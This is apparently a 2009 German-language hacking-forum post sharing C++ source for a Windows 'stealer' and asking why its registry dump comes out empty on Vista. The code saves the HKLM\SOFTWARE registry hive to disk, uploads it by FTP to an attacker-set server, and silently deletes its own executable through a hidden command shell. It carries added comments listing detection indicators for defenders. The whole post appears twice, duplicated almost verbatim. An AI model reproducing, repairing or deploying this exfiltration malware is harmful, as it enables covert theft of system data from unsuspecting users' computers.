skullyan
15.04.2009, 23:33
#include <windows.h>
#include <wininet.h>
#include <process.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <conio.h>
using namespace std;
// Forward declarations for the three stages main() runs in order:
// save() (registry dump to disk), upload() (FTP transfer of that dump),
// SelfDelete() (removal of the running executable).
void upload(char *server, char *account, char *passwort);
void save();
BOOL SelfDelete();
// Entry point: dump -> exfiltrate -> remove own executable, with no user interaction.
// Analyst note: the three stages map to collection, exfiltration and
// anti-forensic cleanup; each leaves its own artefact (a file on disk,
// an outbound FTP session, a child cmd.exe process).
int main()
{
save();
// Placeholder initialisers as posted. The intent appears to be an FTP host and
// login compiled into the binary; such values are recoverable from a sample by
// static string extraction and are useful for attribution and takedown.
char server[50] = {'serveradresse'};
char account[50] = {'username'};
char passwort[50] = {'passwort'};
upload(server, account, passwort);
// The BOOL result of SelfDelete() is discarded.
SelfDelete();
return EXIT_SUCCESS;
}
// Sends the fixed local file C:\data.reg to an FTP server via WinINet.
//   server   - FTP host name passed to InternetConnect
//   account  - FTP user name
//   passwort - FTP password
// Detection notes for defenders:
//  - FTP is unencrypted, so the login and the transferred file are visible to
//    network monitoring; unexpected outbound connections to the default FTP
//    port from a workstation are worth alerting on or blocking at egress.
//  - The agent string "FTP Upload" and the paths "C:\data.reg" / "//data.reg"
//    are literal strings in the binary and can serve as static indicators.
void upload(char *server, char *account, char *passwort)
{
HINTERNET hOpen, hConnection;
// Direct connection: no proxy is configured for the WinINet session.
hOpen = InternetOpen("FTP Upload", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hConnection = InternetConnect(hOpen, server, INTERNET_DEFAULT_FTP_PORT,
account, passwort, INTERNET_SERVICE_FTP, 0, 0);
// Binary transfer of the local dump to the remote name "//data.reg".
FtpPutFile(hConnection, "C:\\data.reg", "//data.reg",
FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hConnection);
InternetCloseHandle(hOpen);
}
// Opens HKEY_LOCAL_MACHINE\SOFTWARE and asks the registry API to save that key
// to the file C:\data.reg.
// Detection notes for defenders:
//  - A user-mode program requesting KEY_ALL_ACCESS on HKLM\SOFTWARE and then
//    calling RegSaveKey is unusual outside backup tooling.
//  - The output lands in the root of C: under a fixed name, so file-creation
//    monitoring on that path is a cheap indicator for this sample.
void save()
{
HKEY key;
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\", 0, KEY_ALL_ACCESS, &key);
RegSaveKey(key, "C:\\data.reg", 0);
RegCloseKey(key);
}
// Launches a hidden command interpreter that is told to delete this program's
// own executable file.
// Returns TRUE when ShellExecute reports success (a value greater than 32),
// FALSE when any step fails.
// Detection notes for defenders:
//  - Process-creation logging with command lines enabled (e.g. Windows event
//    4688 or Sysmon event 1) records the interpreter from %ComSpec% being
//    started with "/c del <image path>" by the very image named in the command.
//    That parent/child pattern is a common anti-forensics signature.
//  - SW_HIDE means no console window is shown to the user.
BOOL SelfDelete()
{
TCHAR szFile[MAX_PATH], szCmd[MAX_PATH];
// Resolve the path of the running image and convert it to its short (8.3) form.
if((GetModuleFileName(0,szFile,MAX_PATH)!=0) &&
(GetShortPathName(szFile,szFile,MAX_PATH)!=0))
{
// Build the argument string: /c del <short path> >> NUL
lstrcpy(szCmd,"/c del ");
lstrcat(szCmd,szFile);
lstrcat(szCmd," >> NUL");
// szFile is reused to hold the interpreter path read from %ComSpec%.
if((GetEnvironmentVariable("ComSpec",szFile,MAX_PATH)!=0) &&
((INT)ShellExecute(0,0,szFile,szCmd,0,SW_HIDE)>32))
return TRUE;
}
return FALSE;
}
Der Stealer ist so gecodet, dass er die Registry kopieren und auf einen Server schicken soll. Die Reg-Datei hat aber 0 KB. Ich habe es auf Vista probiert. Woran liegt's?
#include <wininet.h>
#include <process.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <conio.h>
using namespace std;
// Forward declarations for the three stages main() runs in order:
// save() (registry dump to disk), upload() (FTP transfer of that dump),
// SelfDelete() (removal of the running executable).
void upload(char *server, char *account, char *passwort);
void save();
BOOL SelfDelete();
// Entry point: dump -> exfiltrate -> remove own executable, with no user interaction.
// Analyst note: the three stages map to collection, exfiltration and
// anti-forensic cleanup; each leaves its own artefact (a file on disk,
// an outbound FTP session, a child cmd.exe process).
int main()
{
save();
// Placeholder initialisers as posted. The intent appears to be an FTP host and
// login compiled into the binary; such values are recoverable from a sample by
// static string extraction and are useful for attribution and takedown.
char server[50] = {'serveradresse'};
char account[50] = {'username'};
char passwort[50] = {'passwort'};
upload(server, account, passwort);
// The BOOL result of SelfDelete() is discarded.
SelfDelete();
return EXIT_SUCCESS;
}
// Sends the fixed local file C:\data.reg to an FTP server via WinINet.
//   server   - FTP host name passed to InternetConnect
//   account  - FTP user name
//   passwort - FTP password
// Detection notes for defenders:
//  - FTP is unencrypted, so the login and the transferred file are visible to
//    network monitoring; unexpected outbound connections to the default FTP
//    port from a workstation are worth alerting on or blocking at egress.
//  - The agent string "FTP Upload" and the paths "C:\data.reg" / "//data.reg"
//    are literal strings in the binary and can serve as static indicators.
void upload(char *server, char *account, char *passwort)
{
HINTERNET hOpen, hConnection;
// Direct connection: no proxy is configured for the WinINet session.
hOpen = InternetOpen("FTP Upload", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hConnection = InternetConnect(hOpen, server, INTERNET_DEFAULT_FTP_PORT,
account, passwort, INTERNET_SERVICE_FTP, 0, 0);
// Binary transfer of the local dump to the remote name "//data.reg".
FtpPutFile(hConnection, "C:\\data.reg", "//data.reg",
FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hConnection);
InternetCloseHandle(hOpen);
}
// Opens HKEY_LOCAL_MACHINE\SOFTWARE and asks the registry API to save that key
// to the file C:\data.reg.
// Detection notes for defenders:
//  - A user-mode program requesting KEY_ALL_ACCESS on HKLM\SOFTWARE and then
//    calling RegSaveKey is unusual outside backup tooling.
//  - The output lands in the root of C: under a fixed name, so file-creation
//    monitoring on that path is a cheap indicator for this sample.
void save()
{
HKEY key;
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\", 0, KEY_ALL_ACCESS, &key);
RegSaveKey(key, "C:\\data.reg", 0);
RegCloseKey(key);
}
// Launches a hidden command interpreter that is told to delete this program's
// own executable file.
// Returns TRUE when ShellExecute reports success (a value greater than 32),
// FALSE when any step fails.
// Detection notes for defenders:
//  - Process-creation logging with command lines enabled (e.g. Windows event
//    4688 or Sysmon event 1) records the interpreter from %ComSpec% being
//    started with "/c del <image path>" by the very image named in the command.
//    That parent/child pattern is a common anti-forensics signature.
//  - SW_HIDE means no console window is shown to the user.
BOOL SelfDelete()
{
TCHAR szFile[MAX_PATH], szCmd[MAX_PATH];
// Resolve the path of the running image and convert it to its short (8.3) form.
if((GetModuleFileName(0,szFile,MAX_PATH)!=0) &&
(GetShortPathName(szFile,szFile,MAX_PATH)!=0))
{
// Build the argument string: /c del <short path> >> NUL
lstrcpy(szCmd,"/c del ");
lstrcat(szCmd,szFile);
lstrcat(szCmd," >> NUL");
// szFile is reused to hold the interpreter path read from %ComSpec%.
if((GetEnvironmentVariable("ComSpec",szFile,MAX_PATH)!=0) &&
((INT)ShellExecute(0,0,szFile,szCmd,0,SW_HIDE)>32))
return TRUE;
}
return FALSE;
}
Der Stealer ist so gecodet, dass er die Registry kopieren und auf einen Server schicken soll. Die Reg-Datei hat aber 0 KB. Ich habe es auf Vista probiert. Woran liegt's?